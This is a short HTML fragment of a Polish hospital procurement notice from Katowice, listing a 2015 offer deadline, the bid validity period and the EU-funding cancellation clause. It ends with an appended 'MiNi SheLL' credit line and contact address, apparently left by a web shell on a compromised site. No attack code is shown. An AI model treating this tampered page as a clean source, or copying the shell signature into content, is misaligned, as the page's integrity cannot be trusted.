<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2015 godzina 10:00, miejsce: Szpital im. St. Leszczyńskiego w Katowicach, 40-074 Katowice, ul.Raciborska 26, Kancelaria Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com